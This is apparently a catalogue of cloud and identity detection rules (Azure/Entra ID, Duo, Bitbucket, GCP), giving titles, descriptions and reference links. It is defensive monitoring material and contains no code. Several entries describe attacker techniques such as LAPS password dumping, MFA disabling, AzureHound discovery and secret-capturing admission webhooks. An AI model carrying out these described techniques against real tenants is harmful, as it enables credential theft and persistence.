Detects when multi-factor authentication has been disabled, which might indicate malicious activity to bypass authentication mechanisms. |
https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates |
Azure Network Firewall Policy Modified or Deleted |
Identifies when a Firewall Policy is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Point-to-site VPN Modified or Deleted |
Identifies when a Point-to-site VPN is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Firewall Rule Configuration Modified or Deleted |
Identifies when a Firewall Rule Configuration is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Network Security Configuration Modified or Deleted |
Identifies when a network security configuration is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Virtual Network Device Modified or Deleted |
Identifies when a virtual network device is being modified or deleted.
This can be a network interface, network virtual appliance, virtual hub, or virtual router.
|
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure New CloudShell Created |
Identifies when a new Cloud Shell is created inside the Azure portal. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Owner Removed From Application or Service Principal |
Identifies when an owner was removed from an application or service principal in Azure. |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy |
Rare Subscription-level Operations In Azure |
Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. |
https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml |
Azure Service Principal Created |
Identifies when a service principal is created in Azure. |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy |
Azure Service Principal Removed |
Identifies when a service principal was removed in Azure. |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy |
Azure Subscription Permission Elevation Via ActivityLogs |
Detects when a user has been elevated to manage all Azure Subscriptions.
This change should be investigated immediately if it isn't planned.
This setting could allow an attacker access to Azure subscriptions in your environment.
|
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization |
Azure Suppression Rule Created |
Identifies when a suppression rule is created in Azure. Adversaries could attempt this to evade detection. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Virtual Network Modified or Deleted |
Identifies when a Virtual Network is modified or deleted in Azure. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure VPN Connection Modified or Deleted |
Identifies when a VPN connection is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
CA Policy Removed by Non Approved Actor |
Monitor and alert on conditional access changes where a non-approved actor removed a CA policy. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access |
CA Policy Updated by Non Approved Actor |
Monitor and alert on conditional access changes. Is the initiating actor approved to make changes? Review Modified Properties and compare the "old" vs "new" value. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access |
New CA Policy by Non-approved Actor |
Monitor and alert on conditional access changes. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure |
Bitlocker Key Retrieval |
Monitor and alert for Bitlocker key retrieval. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval |
Account Created And Deleted Within A Close Time Frame |
Detects when an account was created and deleted in a short period of time. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#short-lived-accounts |
Certificate-Based Authentication Enabled |
Detects when certificate-based authentication has been enabled in an Azure Active Directory tenant. |
https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f, https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/ |
Changes to Device Registration Policy |
Monitor and alert for changes to the device registration policy. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy |
Guest Users Invited To Tenant By Non Approved Inviters |
Detects guest users being invited to the tenant by non-approved inviters. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins |
New Root Certificate Authority Added |
Detects a newly added root certificate authority in an Azure AD tenant, added to support certificate-based authentication. |
https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f, https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/ |
Users Added to Global or Device Admin Roles |
Monitor and alert for users added to device admin roles. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-administrator-roles |
Application AppID Uri Configuration Changes |
Detects when a configuration change is made to an application's AppID URI. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed |
Added Credentials to Existing Application |
Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials |
Delegated Permissions Granted For All Users |
Detects when highly privileged delegated permissions are granted on behalf of all users. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions |
End User Consent |
Detects when an end user consents to an application. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-consent |
End User Consent Blocked |
Detects when end user consent is blocked due to risk-based consent. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-stopped-due-to-risk-based-consent |
Added Owner To Application |
Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#new-owner |
App Granted Microsoft Permissions |
Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, SharePoint, or Azure AD. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions |
App Granted Privileged Delegated Or App Permissions |
Detects when an administrator grants either application permissions (app roles) or highly privileged delegated permissions. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions |
App Assigned To Azure RBAC/Microsoft Entra Role |
Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role |
Application URI Configuration Changes |
Detects when a configuration change is made to an application's URI.
URIs for domain names that no longer exist (dangling URIs), URIs not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated.
|
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes |
Windows LAPS Credential Dump From Entra ID |
Detects when an account dumps the LAPS password from Entra ID. |
https://twitter.com/NathanMcNulty/status/1785051227568632263, https://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/, https://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487 |
Change to Authentication Method |
A change to an authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Azure Domain Federation Settings Modified |
Identifies when a user or application modified the federation settings on the domain. |
https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes |
User Added To Group With CA Policy Modification Access |
Monitor and alert on membership additions to groups that have CA policy modification access. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access |
User Removed From Group With CA Policy Modification Access |
Monitor and alert on membership removals from groups that have CA policy modification access. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access |
Guest User Invited By Non Approved Inviters |
Detects when a user that doesn't have permissions to invite a guest user attempts to invite one. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#things-to-monitor |
User State Changed From Guest To Member |
Detects the change of user type from "Guest" to "Member" for potential elevation of privilege. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins |
PIM Approvals And Deny Elevation |
Detects when a PIM elevation is approved or denied. Approvals or denials outside of normal operations should be investigated. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment |
PIM Alert Setting Changes To Disabled |
Detects when PIM alerts are set to disabled. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment |
Changes To PIM Settings |
Detects when changes are made to PIM roles. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment |
User Added To Privilege Role |
Detects when a user is added to a privileged role. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment |
Bulk Deletion Changes To Privileged Account Permissions |
Detects when a user is removed from a privileged role. Bulk changes should be investigated. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment |
Privileged Account Creation |
Detects when a new admin is created. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts |
Azure Subscription Permission Elevation Via AuditLogs |
Detects when a user has been elevated to manage all Azure Subscriptions.
This change should be investigated immediately if it isn't planned.
This setting could allow an attacker access to Azure subscriptions in your environment.
|
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation |
Temporary Access Pass Added To An Account |
Detects when a temporary access pass (TAP) is added to an account. TAPs added to privileged accounts should be investigated. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts |
User Risk and MFA Registration Policy Updated |
Detects changes and updates to the user risk and MFA registration policy.
Attackers can modify these policies to bypass MFA, weaken security thresholds, facilitate further attacks, and maintain persistence.
|
https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy, https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities |
Multi Factor Authentication Disabled For User Account |
Detects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled".
Threat actors have been seen disabling multi-factor authentication for users in order to maintain or achieve access to the account. This is also seen in SIM swap attacks.
|
https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/ |
Password Reset By User Account |
Detects when a user has reset their password in Azure AD. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Anomalous Token |
Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-token, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Anomalous User Activity |
Indicates that there are anomalous patterns of behavior like suspicious changes to the directory. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-user-activity, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Activity From Anonymous IP Address |
Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Anonymous IP Address |
Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN. |
https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0, https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anonymous-ip-address |
Atypical Travel |
Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Impossible Travel |
Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#impossible-travel, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Suspicious Inbox Forwarding Identity Protection |
Indicates suspicious rules, such as an inbox rule that forwards a copy of all emails to an external address. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-forwarding, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Suspicious Inbox Manipulation Rules |
Detects when suspicious rules that delete or move messages or folders are set on a user's inbox. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Azure AD Account Credential Leaked |
Indicates that the user's valid credentials have been leaked. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Malicious IP Address Sign-In Failure Rate |
Indicates sign-in from a malicious IP address based on high failure rates. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Malicious IP Address Sign-In Suspicious |
Indicates sign-in from a malicious IP address known to be malicious at time of sign-in. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Sign-In From Malware Infected IP |
Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Password Spray Activity |
Indicates that a password spray attack has been successfully performed. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Primary Refresh Token Access Attempt |
Indicates an access attempt to the PRT resource, which can be used to move laterally into an organization or perform credential theft. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Suspicious Browser Activity |
Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-browser, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Azure AD Threat Intelligence |
Indicates user activity that is unusual for the user or consistent with known attack patterns. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in, https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
SAML Token Issuer Anomaly |
Indicates that the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#token-issuer-anomaly, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
New Country |
Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Unfamiliar Sign-In Properties |
Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Stale Accounts In A Privileged Role |
Identifies when an account hasn't signed in during the past n days. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role |
Invalid PIM License |
Identifies when an organization doesn't have the proper license for PIM and is out of compliance. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance |
Roles Assigned Outside PIM |
Identifies when a privileged role assignment has taken place outside of PIM, which may indicate an attack. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management |
Roles Activation Doesn't Require MFA |
Identifies when a privileged role can be activated without performing MFA. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation |
Roles Activated Too Frequently |
Identifies when the same privileged role has multiple activations by the same user. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently |
Roles Are Not Being Used |
Identifies when a user has been assigned a privileged role and is not using that role. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles |
Too Many Global Admins |
Identifies an event where there are too many accounts assigned the Global Administrator role. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators |
Account Lockout |
Identifies a user account that has been locked because the user tried to sign in too many times with an incorrect user ID or password. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Successful Authentications From Countries You Do Not Operate Out Of |
Detect successful authentications from countries you do not operate out of. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts |
Increased Failed Authentications Of Any Type |
Detects when failed sign-ins increased by 10% or greater. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins |
Measurable Increase Of Successful Authentications |
Detects when successful sign-ins increased by 10% or greater. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins |
Authentications To Important Apps Using Single Factor Authentication |
Detects when authentications to important application(s) only required single-factor authentication. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts |
Discovery Using AzureHound |
Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication. |
https://github.com/BloodHoundAD/AzureHound |
Failed Authentications From Countries You Do Not Operate Out Of |
Detect failed authentications from countries you do not operate out of. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts |
Device Registration or Join Without MFA |
Monitor and alert for device registration or join events where MFA was not performed. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy |
Azure AD Only Single Factor Authentication Required |
Detect when users are authenticating without MFA being required. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts |
Suspicious SignIns From A Non Registered Device |
Detects risky authentication from a device that is not registered in Azure AD, without MFA being required. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in |
Sign-ins from Non-Compliant Devices |
Monitor and alert for sign-ins where the device was non-compliant. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in |
Sign-ins by Unknown Devices |
Monitor and alert for sign-ins by unknown devices from non-trusted locations. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in |
Potential MFA Bypass Using Legacy Client Authentication |
Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack. |
https://web.archive.org/web/20230217071802/https://blooteem.com/march-2022, https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/ |
Application Using Device Code Authentication Flow |
Device code flow is an OAuth 2.0 protocol flow specifically for input-constrained devices and is not used in all environments.
If this type of flow is seen in the environment and is not being used in an input-constrained device scenario, further investigation is warranted.
This can be a misconfigured application or potentially something malicious.
|
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows |
Applications That Are Using ROPC Authentication Flow |
Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.
The application then uses those credentials to authenticate the user against the identity provider.
|
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows |
Account Disabled or Blocked for Sign in Attempts |
Detects when an account that is disabled or blocked for sign-in attempts to log in. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts |
Sign-in Failure Due to Conditional Access Requirements Not Met |
Define a baseline threshold for failed sign-ins due to Conditional Access failures. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts |
Use of Legacy Authentication Protocols |
Alerts when legacy authentication has been used on an account. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts |
Login to Disabled Account |
Detect failed attempts to sign in to disabled accounts. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Multifactor Authentication Denied |
The user has indicated that they did not initiate the MFA prompt, which could indicate an attacker has the password for the account. |
https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ |
Azure Unusual Authentication Interruption |
Detects when there is an interruption in the authentication process. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Multifactor Authentication Interrupted |
Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Users Authenticating To Other Azure AD Tenants |
Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins |
User Access Blocked by Azure Conditional Access |
Detects when access has been blocked by Conditional Access policies.
The access policy does not allow token issuance, which might be a sign of unauthorized login to valid accounts.
|
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Bitbucket Full Data Export Triggered |
Detects when full data export is attempted. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html |
Bitbucket Global Permission Changed |
Detects global permissions change activity. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html |
Bitbucket Global Secret Scanning Rule Deleted |
Detects Bitbucket global secret scanning rule deletion activity. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html |
Bitbucket Global SSH Settings Changed |
Detects Bitbucket global SSH access configuration changes. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html |
Bitbucket Audit Log Configuration Updated |
Detects changes to the Bitbucket audit log configuration. |
https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html |
Bitbucket Project Secret Scanning Allowlist Added |
Detects when a secret scanning allowlist rule is added for projects. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html |
Bitbucket Secret Scanning Exempt Repository Added |
Detects when a repository is exempted from the secret scanning feature. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html |
Bitbucket Secret Scanning Rule Deleted |
Detects when a secret scanning rule is deleted for a project or repository. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html |
Bitbucket Unauthorized Access To A Resource |
Detects unauthorized access attempts to a resource. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html |
Bitbucket Unauthorized Full Data Export Triggered |
Detects when a full data export is attempted by an unauthorized user. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html |
Bitbucket User Details Export Attempt Detected |
Detects user data export activity. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts |
Bitbucket User Login Failure |
Detects user authentication failure events.
Please note that this rule can be noisy; it is recommended to use it with correlation based on the "author.name" field.
|
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html |
Bitbucket User Login Failure Via SSH |
Detects SSH user login access failures.
Please note that this rule can be noisy; it is recommended to use it with correlation based on the "author.name" field.
|
https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html, https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html |
Bitbucket User Permissions Export Attempt |
Detects user permission data export attempt. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html |
Cisco Duo Successful MFA Authentication Via Bypass Code |
Detects when a successful MFA authentication occurs due to the use of a bypass code.
A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.
|
https://duo.com/docs/adminapi#logs, https://help.duo.com/s/article/6327?language=en_US |
GCP Access Policy Deleted |
Detects when an access policy that is applied to a GCP cloud resource is deleted.
An adversary would be able to remove access policies to gain access to a GCP cloud resource.
|
https://cloud.google.com/access-context-manager/docs/audit-logging, https://cloud.google.com/logging/docs/audit/understanding-audit-logs, https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog |
GCP Break-glass Container Workload Deployed |
Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.
|
https://cloud.google.com/binary-authorization |
Google Cloud Storage Buckets Enumeration |
Detects when a storage bucket is enumerated in Google Cloud. |
https://cloud.google.com/storage/docs/json_api/v1/buckets |
Google Cloud Storage Buckets Modified or Deleted |
Detects when a storage bucket is modified or deleted in Google Cloud. |
https://cloud.google.com/storage/docs/json_api/v1/buckets |
Google Cloud Re-identifies Sensitive Information |
Identifies when sensitive information is re-identified in Google Cloud. |
https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify |
Google Cloud DNS Zone Modified or Deleted |
Identifies when a DNS Zone is modified or deleted in Google Cloud. |
https://cloud.google.com/dns/docs/reference/v1/managedZones |
Google Cloud Firewall Modified or Deleted |
Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). |
https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging, https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html |
Google Full Network Traffic Packet Capture |
Identifies potential full network packet capture in GCP. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. |
https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging, https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html |
Google Cloud Kubernetes Admission Controller |
Identifies when an admission controller is executed in GCP Kubernetes.
A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.
The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.
An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.
For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can also use a ValidatingAdmissionWebhook to obtain access credentials:
such a webhook can intercept the requests to the API server and record secrets and other sensitive information.
|
https://cloud.google.com/kubernetes-engine/docs |
Google Cloud Kubernetes CronJob |
Identifies when a Google Cloud Kubernetes CronJob runs. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.
A Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs.
An adversary may use a Kubernetes CronJob to schedule the execution of malicious code that would run as a container in the cluster.
|
https://cloud.google.com/kubernetes-engine/docs, https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/, https://kubernetes.io/docs/concepts/workloads/controllers/job/ |
Google Cloud Kubernetes RoleBinding |
Detects the creation or patching of a potentially malicious RoleBinding. This includes RoleBindings and ClusterRoleBindings. |
https://github.com/elastic/detection-rules/pull/1267, https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole, https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control, https://kubernetes.io/docs/reference/access-authn-authz/rbac/, https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging |
Google Cloud Kubernetes Secrets Modified or Deleted |
Identifies when Kubernetes Secrets are modified or deleted. |
https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging |
Google Cloud Service Account Disabled or Deleted |
Identifies when a service account is disabled or deleted in Google Cloud. |
https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts |
Google Cloud Service Account Modified |
Identifies when a service account is modified in Google Cloud. |
https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts |
Google Cloud SQL Database Modified or Deleted |
Detect when a Cloud SQL DB has been modified or deleted. |
https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update |
Google Cloud VPN Tunnel Modified or Deleted |
Identifies when a VPN Tunnel is modified or deleted in Google Cloud. |
